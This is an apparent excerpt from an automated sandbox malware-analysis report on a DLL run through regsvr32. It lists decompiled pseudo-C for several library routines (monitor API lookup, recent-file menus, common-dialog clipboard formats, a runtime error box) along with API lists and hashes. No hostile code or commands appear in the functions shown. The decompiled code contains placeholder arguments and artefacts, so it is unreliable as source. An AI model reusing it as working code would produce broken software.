                                                                        0x100079c3
                                                                        0x100079ce
                                                                        0x100079d2
                                                                        0x10007a5f
                                                                        0x10007a5f
                                                                        0x10007a65
                                                                        0x10007a6b
                                                                        0x10007a71
                                                                        0x10007a77
                                                                        0x10007a7d
                                                                        0x10007a83
                                                                        0x10007a89
                                                                        0x10007a93
                                                                        0x100079d8
                                                                        0x100079e4
                                                                        0x100079e8
                                                                        0x100079ed
                                                                        0x00000000
                                                                        0x100079ef
                                                                        0x100079f5
                                                                        0x100079f9
                                                                        0x100079fe
                                                                        0x00000000
                                                                        0x10007a00
                                                                        0x10007a06
                                                                        0x10007a0a
                                                                        0x10007a0f
                                                                        0x00000000
                                                                        0x10007a11
                                                                        0x10007a17
                                                                        0x10007a1b
                                                                        0x10007a20
                                                                        0x00000000
                                                                        0x10007a22
                                                                        0x10007a28
                                                                        0x10007a2c
                                                                        0x10007a31
                                                                        0x00000000
                                                                        0x10007a33
                                                                        0x10007a39
                                                                        0x10007a3d
                                                                        0x10007a42
                                                                        0x00000000
                                                                        0x10007a44
                                                                        0x10007a4a
                                                                        0x10007a4e
                                                                        0x10007a53
                                                                        0x00000000
                                                                        0x10007a55
                                                                        0x10007a57
                                                                        0x10007a58
                                                                        0x10007a58
                                                                        0x10007a53
                                                                        0x10007a42
                                                                        0x10007a31
                                                                        0x10007a20
                                                                        0x10007a0f
                                                                        0x100079fe
                                                                        0x100079ed
                                                                        0x10007a98
                                                                        0x100079aa
                                                                        0x100079ac
                                                                        0x100079b6
                                                                        0x100079b6

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                        • API String ID: 667068680-68207542
                                                                        • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                        • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024FBB Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 273stringwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				char _v268;
				char _v292;
				char _v296;
				signed int _v300;
				CHAR* _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				void* __ebp;
				signed int _t102;
				intOrPtr _t106;
				signed int _t108;
				signed int _t110;
				int* _t118;
				signed int _t125;
				signed int _t128;
				signed int _t132;
				void* _t136;
				intOrPtr* _t138;
				void* _t170;
				intOrPtr* _t171;
				void* _t173;
				int _t175;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t180;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr _t183;
				signed char _t196;
				signed char _t197;
				signed int _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				void* _t223;
				intOrPtr* _t224;
				signed int _t226;
				void* _t228;
				void* _t229;
				void* _t230;

				_t223 = __esi;
				_t181 = __ecx;
				_t170 = __ebx;
				_t102 =  *0x1004c470; // 0x303bb91f
				_push(__esi);
				_push(__edi);
				_v8 = _t102;
				_t219 = __ecx;
				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
					L10:
					_push(0);
					_push(0xffffffff);
					_push(3);
					E10027180(_t181);
					asm("int3");
					E10011BF0(0x1003ab29, _t228);
					_t230 = _t229 - 0x12c;
					_t106 =  *0x1004c470; // 0x303bb91f
					_push(_t170);
					_push(_t223);
					_t224 = _a4;
					_push(_t219);
					_t220 = _t181;
					_t182 =  *(_t224 + 0xc);
					_v20 = _t106;
					_t171 = _t220 + 0x1c;
					_t108 =  *( *_t171 - 0xc);
					__eflags = _t108;
					if(_t108 == 0) {
						__eflags = _t182;
						if(_t182 != 0) {
							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
						}
					}
					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
					_t110 = 0;
					__eflags =  *(_t183 - 0xc);
					if( *(_t183 - 0xc) != 0) {
						__eflags =  *(_t224 + 0xc);
						if( *(_t224 + 0xc) != 0) {
							_t173 = 0;
							__eflags =  *(_t220 + 4);
							if( *(_t220 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
									_t173 = _t173 + 1;
									__eflags = _t173 -  *(_t220 + 4);
								} while (_t173 <  *(_t220 + 4));
							}
							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 0x104;
								if(_t110 < 0x104) {
									_t175 = lstrlenA( &_v292);
									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
									_t176 = _t175 + 1;
									_v308 = _t176;
									 *((char*)(_t228 + _t176 - 0x120)) = 0;
									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
									_v8 = _v8 & 0x00000000;
									_t118 = E100243B2();
									_t216 =  *_t118;
									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
									_a4 = _a4 & 0x00000000;
									__eflags =  *(_t220 + 4);
									_v8 = 1;
									if( *(_t220 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L40;
											}
											_t177 = _v300;
											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
											while(1) {
												_t196 =  *_t177;
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags = _t196 - 0x26;
												if(_t196 == 0x26) {
													 *_t128 = _t196;
													_t128 = _t128 + 1;
													__eflags = _t128;
												}
												_t197 =  *_t177;
												_t217 = _t197 & 0x000000ff;
												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
													 *_t128 = _t197;
													_t128 = _t128 + 1;
													_t177 = _t177 + 1;
													__eflags = _t177;
												}
												 *_t128 =  *_t177;
												_t128 = _t128 + 1;
												_t177 = _t177 + 1;
												__eflags = _t177;
											}
											 *_t128 = _t196;
											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
											__eflags = _t132 - 0xa;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													wsprintfA( &_v32, ??, "&%d ", _t132);
													goto L38;
												} else {
													lstrcpyA( &_v32, "1&0 ");
												}
											} else {
												wsprintfA( &_v32, ??, "%d ", _t132);
												L38:
												_t230 = _t230 + 0xc;
											}
											_push( &_v32);
											_t136 = E10006B11( &_v312, __eflags);
											_push( &_v296);
											_push(_t136);
											_push( &_v316);
											_v8 = 2;
											_t138 = E10024DC7( &_v296, __eflags);
											_t216 =  *(_t224 + 8);
											_t203 =  *(_t224 + 4);
											_t77 = _t216 + 1; // 0x1
											 *(_t224 + 8) = _t77;
											_t79 = _t203 + 1; // 0x3
											_t230 = _t230 + 0xc;
											 *(_t224 + 4) = _t79;
											_v304 =  *_t138;
											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
											_v8 = 1;
											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
											_a4 = _a4 + 1;
											__eflags = _a4 -  *(_t220 + 4);
											if(_a4 <  *(_t220 + 4)) {
												_t176 = _v308;
												continue;
											}
											goto L40;
										}
									}
									L40:
									 *(_t224 + 8) =  *(_t224 + 8) - 1;
									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
									 *((intOrPtr*)(_t224 + 0x18)) = 1;
									E100014B0(_v296 + 0xfffffff0, _t216);
									__eflags = _v300 + 0xfffffff0;
									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
								}
							}
						}
					} else {
						_t180 =  *_t171;
						__eflags =  *(_t180 - 0xc);
						if( *(_t180 - 0xc) != 0) {
							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
						}
						_t110 =  *((intOrPtr*)( *_t224))(0);
					}
					 *[fs:0x0] = _v16;
					return E100117AE(_t110, _v20);
				} else {
					_push(_a4);
					_push( &_v268);
					if(E1002592C(__ebx, _t219, __esi) == 0) {
						goto L10;
					} else {
						_t226 = 0;
						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
								_t226 = _t226 + 1;
								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
									continue;
								} else {
								}
								L8:
								while(_t226 > 0) {
									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
									_t226 = _t226 - 1;
									__eflags = _t226;
								}
								goto L9;
							}
							goto L8;
						}
						L9:
						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
					}
				}
			}















































                                                                        0x10024fbb
                                                                        0x10024fbb
                                                                        0x10024fbb
                                                                        0x10024fc8
                                                                        0x10024fcd
                                                                        0x10024fce
                                                                        0x10024fcf
                                                                        0x10024fd2
                                                                        0x10024fd4
                                                                        0x1002505a
                                                                        0x1002505a
                                                                        0x1002505c
                                                                        0x1002505e
                                                                        0x10025060
                                                                        0x10025065
                                                                        0x1002506b
                                                                        0x10025070
                                                                        0x10025076
                                                                        0x1002507b
                                                                        0x1002507c
                                                                        0x1002507d
                                                                        0x10025080
                                                                        0x10025081
                                                                        0x10025083
                                                                        0x10025086
                                                                        0x10025089
                                                                        0x1002508e
                                                                        0x10025091
                                                                        0x10025093
                                                                        0x10025095
                                                                        0x10025097
                                                                        0x1002509e
                                                                        0x1002509e
                                                                        0x10025097
                                                                        0x100250a6
                                                                        0x100250a8
                                                                        0x100250aa
                                                                        0x100250ad
                                                                        0x100250cb
                                                                        0x100250ce
                                                                        0x100250d4
                                                                        0x100250d6
                                                                        0x100250d9
                                                                        0x100250db
                                                                        0x100250e9
                                                                        0x100250ef
                                                                        0x100250f0
                                                                        0x100250f0
                                                                        0x100250db
                                                                        0x10025102
                                                                        0x10025108
                                                                        0x1002510a
                                                                        0x10025110
                                                                        0x10025112
                                                                        0x10025125
                                                                        0x10025127
                                                                        0x1002512f
                                                                        0x10025130
                                                                        0x10025136
                                                                        0x1002514d
                                                                        0x10025153
                                                                        0x10025157
                                                                        0x1002515c
                                                                        0x10025166
                                                                        0x1002516c
                                                                        0x10025170
                                                                        0x10025174
                                                                        0x10025178
                                                                        0x10025186
                                                                        0x1002519e
                                                                        0x100251a1
                                                                        0x100251a3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100251a9
                                                                        0x100251bb
                                                                        0x100251e2
                                                                        0x100251e2
                                                                        0x100251e4
                                                                        0x100251e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100251c2
                                                                        0x100251c5
                                                                        0x100251c7
                                                                        0x100251c9
                                                                        0x100251c9
                                                                        0x100251c9
                                                                        0x100251ca
                                                                        0x100251cc
                                                                        0x100251cf
                                                                        0x100251d6
                                                                        0x100251d8
                                                                        0x100251da
                                                                        0x100251db
                                                                        0x100251db
                                                                        0x100251db
                                                                        0x100251de
                                                                        0x100251e0
                                                                        0x100251e1
                                                                        0x100251e1
                                                                        0x100251e1
                                                                        0x100251e8
                                                                        0x100251f2
                                                                        0x10025201
                                                                        0x10025204
                                                                        0x10025207
                                                                        0x10025211
                                                                        0x1002522e
                                                                        0x00000000
                                                                        0x10025213
                                                                        0x1002521c
                                                                        0x1002521c
                                                                        0x10025209
                                                                        0x1002522e
                                                                        0x1002522a
                                                                        0x10025234
                                                                        0x10025234
                                                                        0x1002523a
                                                                        0x10025241
                                                                        0x1002524c
                                                                        0x1002524d
                                                                        0x10025254
                                                                        0x10025255
                                                                        0x10025259
                                                                        0x1002525e
                                                                        0x10025261
                                                                        0x10025264
                                                                        0x10025267
                                                                        0x1002526a
                                                                        0x1002526d
                                                                        0x10025270
                                                                        0x10025275
                                                                        0x1002528e
                                                                        0x1002529d
                                                                        0x100252ab
                                                                        0x100252af
                                                                        0x100252b4
                                                                        0x100252ba
                                                                        0x100252bd
                                                                        0x10025180
                                                                        0x00000000
                                                                        0x10025180
                                                                        0x00000000
                                                                        0x100252bd
                                                                        0x10025186
                                                                        0x100252c3
                                                                        0x100252c6
                                                                        0x100252db
                                                                        0x100252de
                                                                        0x100252e5
                                                                        0x100252f0
                                                                        0x100252f3
                                                                        0x100252f3
                                                                        0x10025112
                                                                        0x1002510a
                                                                        0x100250af
                                                                        0x100250af
                                                                        0x100250b1
                                                                        0x100250b4
                                                                        0x100250bb
                                                                        0x100250bb
                                                                        0x100250c4
                                                                        0x100250c4
                                                                        0x100252fd
                                                                        0x1002530e
                                                                        0x10024fea
                                                                        0x10024fea
                                                                        0x10024ff3
                                                                        0x10024ffb
                                                                        0x00000000
                                                                        0x10024ffd
                                                                        0x10025000
                                                                        0x10025005
                                                                        0x10025007
                                                                        0x10025021
                                                                        0x10025025
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025027
                                                                        0x00000000
                                                                        0x10025039
                                                                        0x10025033
                                                                        0x10025038
                                                                        0x10025038
                                                                        0x10025038
                                                                        0x00000000
                                                                        0x10025039
                                                                        0x00000000
                                                                        0x10025007
                                                                        0x1002503d
                                                                        0x10025057
                                                                        0x10025057
                                                                        0x10024ffb

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                        • __EH_prolog.LIBCMT ref: 1002506B
                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                        • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                        • wsprintfA.USER32 ref: 1002522E
                                                                          • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                          • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                          • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                        • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                        • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                        • GetMenuItemCount.USER32 ref: 100252CC
                                                                          • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                        • String ID: %d $&%d $1&0 $\
                                                                        • API String ID: 342826643-2399880791
                                                                        • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                        • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001D28C Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 123registryclipboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				intOrPtr _t64;
				signed int* _t65;
				void* _t67;
				intOrPtr* _t69;

				if(_a4 != 0) {
					_push(0x100347fd);
					_t53 = 0x1004efe8;
					_t67 = E10037855(0x1004efe8);
					__eflags =  *(_t67 + 0x18);
					if( *(_t67 + 0x18) != 0) {
						_push(_a4);
						__eflags = E10022115();
						if(__eflags == 0) {
							_t53 =  *(_t67 + 0x18);
							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
							 *(_t67 + 0x18) = 0;
						}
					}
					_t64 = _a8;
					__eflags = _t64 - 0x110;
					if(_t64 != 0x110) {
						__eflags = _t64 -  *0x1004f3b8; // 0x0
						if(__eflags == 0) {
							L22:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L23;
						}
						__eflags = _t64 - 0x111;
						if(_t64 != 0x111) {
							L10:
							__eflags = _t64 - 0xc000;
							if(_t64 >= 0xc000) {
								_push(_a4);
								_t69 = E10022115();
								_t33 = E100244DE(_t69, 0x10040f58);
								__eflags = _t33;
								if(_t33 == 0) {
									L14:
									__eflags = _t64 -  *0x1004f3ac; // 0x0
									if(__eflags != 0) {
										__eflags = _t64 -  *0x1004f3b0; // 0x0
										if(__eflags != 0) {
											__eflags = _t64 -  *0x1004f3a8; // 0x0
											if(__eflags != 0) {
												__eflags = _t64 -  *0x1004f3b4; // 0x0
												if(__eflags != 0) {
													goto L11;
												}
												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
												goto L23;
											}
											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
											goto L11;
										}
										_t19 = _t69 + 0x1c0; // 0x1c0
										_t65 = _t19;
										 *_t65 = _a16;
										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
										 *_t65 =  *_t65 & 0x00000000;
										goto L23;
									}
									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
									goto L23;
								}
								_t40 = E1001CE89(_t69);
								__eflags =  *(_t40 + 0x36) & 0x00000008;
								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
									goto L11;
								}
								goto L14;
							}
							L11:
							_t31 = 0;
							goto L23;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L22;
						}
						goto L10;
					} else {
						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x1004f3bc = _t46;
						_push(_a12);
						_t31 = E1001EB68(_t53, _a4, 0x110);
						L23:
						return _t31;
					}
				}
				return 0;
			}












                                                                        0x1001d295
                                                                        0x1001d29f
                                                                        0x1001d2a4
                                                                        0x1001d2ae
                                                                        0x1001d2b0
                                                                        0x1001d2b3
                                                                        0x1001d2b5
                                                                        0x1001d2bd
                                                                        0x1001d2bf
                                                                        0x1001d2c4
                                                                        0x1001d2c7
                                                                        0x1001d2cc
                                                                        0x1001d2cc
                                                                        0x1001d2bf
                                                                        0x1001d2cf
                                                                        0x1001d2d8
                                                                        0x1001d2da
                                                                        0x1001d33e
                                                                        0x1001d349
                                                                        0x1001d40c
                                                                        0x1001d417
                                                                        0x1001d41f
                                                                        0x1001d41f
                                                                        0x00000000
                                                                        0x1001d41f
                                                                        0x1001d34f
                                                                        0x1001d351
                                                                        0x1001d35f
                                                                        0x1001d35f
                                                                        0x1001d365
                                                                        0x1001d36e
                                                                        0x1001d376
                                                                        0x1001d37f
                                                                        0x1001d384
                                                                        0x1001d386
                                                                        0x1001d395
                                                                        0x1001d395
                                                                        0x1001d39b
                                                                        0x1001d3ac
                                                                        0x1001d3b2
                                                                        0x1001d3ce
                                                                        0x1001d3d4
                                                                        0x1001d3f4
                                                                        0x1001d3fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d404
                                                                        0x00000000
                                                                        0x1001d404
                                                                        0x1001d3e9
                                                                        0x00000000
                                                                        0x1001d3e9
                                                                        0x1001d3b7
                                                                        0x1001d3b7
                                                                        0x1001d3bd
                                                                        0x1001d3c3
                                                                        0x1001d3c9
                                                                        0x00000000
                                                                        0x1001d3c9
                                                                        0x1001d3a4
                                                                        0x00000000
                                                                        0x1001d3a4
                                                                        0x1001d38a
                                                                        0x1001d38f
                                                                        0x1001d393
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d393
                                                                        0x1001d367
                                                                        0x1001d367
                                                                        0x00000000
                                                                        0x1001d367
                                                                        0x1001d353
                                                                        0x1001d359
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d2dc
                                                                        0x1001d2ee
                                                                        0x1001d2fa
                                                                        0x1001d306
                                                                        0x1001d312
                                                                        0x1001d31e
                                                                        0x1001d323
                                                                        0x1001d325
                                                                        0x1001d328
                                                                        0x1001d32d
                                                                        0x1001d334
                                                                        0x1001d420
                                                                        0x00000000
                                                                        0x1001d421
                                                                        0x1001d2da
                                                                        0x00000000

                                                                        APIs
                                                                        • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
                                                                        • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
                                                                        • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardFormatRegister
                                                                        • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                        • API String ID: 1228543026-3888057576
                                                                        • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                        • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016994 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E10016994() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x1004c470; // 0x303bb91f
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x1004cb88; // 0x28000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1004f3d4; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
						_t17 = _t67 + 0x1004cb8c; // 0x10042328
						_t69 = _t17;
						_t24 = E10011820( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10017B90(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10011820(_t63);
							_t12 = _t67 + 0x1004cb8c; // 0x10042328
							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
							E10017BA0(_t51, _t63);
							E10017BA0(_t51, "\n\n");
							_t15 = _t67 + 0x1004cb8c; // 0x10042328
							E10017BA0(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E10019D1D();
						}
					}
				}
				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}















                                                                        0x10016995
                                                                        0x1001699c
                                                                        0x100169a2
                                                                        0x100169a7
                                                                        0x100169af
                                                                        0x100169b8
                                                                        0x100169ba
                                                                        0x100169c3
                                                                        0x100169c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100169c7
                                                                        0x100169cb
                                                                        0x100169ce
                                                                        0x100169d4
                                                                        0x100169da
                                                                        0x100169e2
                                                                        0x10016acf
                                                                        0x10016acf
                                                                        0x10016ad7
                                                                        0x10016ae9
                                                                        0x100169f9
                                                                        0x100169ff
                                                                        0x10016a0f
                                                                        0x10016a1d
                                                                        0x10016a28
                                                                        0x10016a2e
                                                                        0x10016a2f
                                                                        0x10016a3f
                                                                        0x10016a5b
                                                                        0x10016a60
                                                                        0x10016a60
                                                                        0x10016a64
                                                                        0x10016a69
                                                                        0x10016a76
                                                                        0x10016a7e
                                                                        0x10016a82
                                                                        0x10016a87
                                                                        0x10016a8f
